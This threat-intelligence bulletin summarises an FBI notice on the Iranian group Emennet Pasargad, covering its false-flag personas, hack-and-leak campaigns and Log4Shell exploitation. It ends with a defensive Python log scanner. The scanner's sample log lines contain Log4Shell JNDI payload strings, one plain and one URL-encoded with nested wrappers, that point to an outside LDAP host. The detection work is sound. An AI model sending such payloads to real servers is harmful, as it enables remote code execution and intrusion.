Iranian Threat Group Dodges Attributions Through False-Flag Personas
Category: Threat Actor Activity | Industry: N/A | Level: Tactical | Source: FBI
The Federal Bureau of Investigation (FBI) released a private industry notification tracking activity conducted by the Iranian cyber group Emennet Pasargad. The group used false-flag personas to avoid attribution, deflecting its activity onto other hacking groups. Personas adopted by the threat group have included Hackers of Savior, which posed as a pro-Palestinian hacktivist group, and Desus. Operations initiated by the group have mainly targeted entities in Israel; however, the United States has been targeted on multiple occasions, including the 2020 Presidential election and an attack against a US organization in the past year.

Emennet Pasargad conducts hack-and-leak operations, maximizing the psychological impact of its attacks by broadcasting them on social media channels such as Telegram and on online cybercriminal forums to draw attention to its activity. "The FBI assesses the purpose of these operations is to undermine public confidence in the security of the victim’s network and data, as well as embarrass victim companies and targeted countries. These hack-and-leak campaigns involve a combination of hacking/theft of data and information operations that impact victims via financial losses and reputational damage."

The group has a penchant for targeting public-facing applications, especially web servers running PHP code or exposed MySQL databases. At least one US entity was compromised by Emennet Pasargad after the attackers exploited the Log4Shell vulnerability (CVE-2021-44228). Along with data theft, the threat actors have defaced websites and even deployed destructive encryption malware.
Anvilogic Use Cases:
- Potential CVE-2021-44228 - Log4Shell
- Potential PHP Webshell
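As an added illustration of the first use case above (not part of the FBI notification or Anvilogic's own detection content), the snippet below scans web-server access log lines for Log4Shell (CVE-2021-44228) JNDI lookup probes, normalizing URL encoding and the `${lower:}`/`${upper:}` wrappers that defeat naive string matching. The log lines are constructed samples; the IP addresses are documentation ranges.

```python
import re
from urllib.parse import unquote

# Constructed sample access log lines (not real traffic); lines 2 and 3 carry probes.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [10/Dec/2021:14:02:15 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://198.51.100.5:1389/a}"
203.0.113.12 - - [10/Dec/2021:14:02:19 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.5%2Fb%7D HTTP/1.1" 400 0 "-" "curl/7.79"
203.0.113.13 - - [10/Dec/2021:14:02:22 +0000] "GET /about HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# ${lower:x} / ${upper:x} wrappers around single characters of the "jndi" keyword.
NESTED = re.compile(r"\$\{(?:lower|upper):([^}]*)\}", re.IGNORECASE)
# The JNDI lookup itself, with the protocol schemes Log4j 2 can resolve.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|nis|nds|corba|http)\s*:", re.IGNORECASE)


def normalize(s: str) -> str:
    """Undo (possibly repeated) URL-encoding, then collapse case-conversion wrappers."""
    for _ in range(3):
        s = unquote(s)
    prev = None
    while prev != s:          # repeat until no nested wrapper remains
        prev = s
        s = NESTED.sub(lambda m: m.group(1), s)
    return s


def find_log4shell_probes(log_text: str) -> list[dict]:
    """Return one record per log line that contains a JNDI lookup after normalization."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = JNDI.search(normalize(line))
        if m:
            hits.append({"line": n,
                         "source_ip": line.split(" ", 1)[0],
                         "protocol": m.group(1).lower()})
    return hits


if __name__ == "__main__":
    for hit in find_log4shell_probes(SAMPLE_LOG):
        print(hit)
```

Any hit is worth triaging against the host's patch state and outbound connection logs, since a successful exploit is followed by an outbound LDAP/RMI fetch from the vulnerable server.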